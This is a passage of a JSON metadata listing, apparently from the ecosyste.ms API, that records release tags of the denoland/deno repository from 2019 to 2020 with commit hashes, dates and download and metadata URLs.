rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16: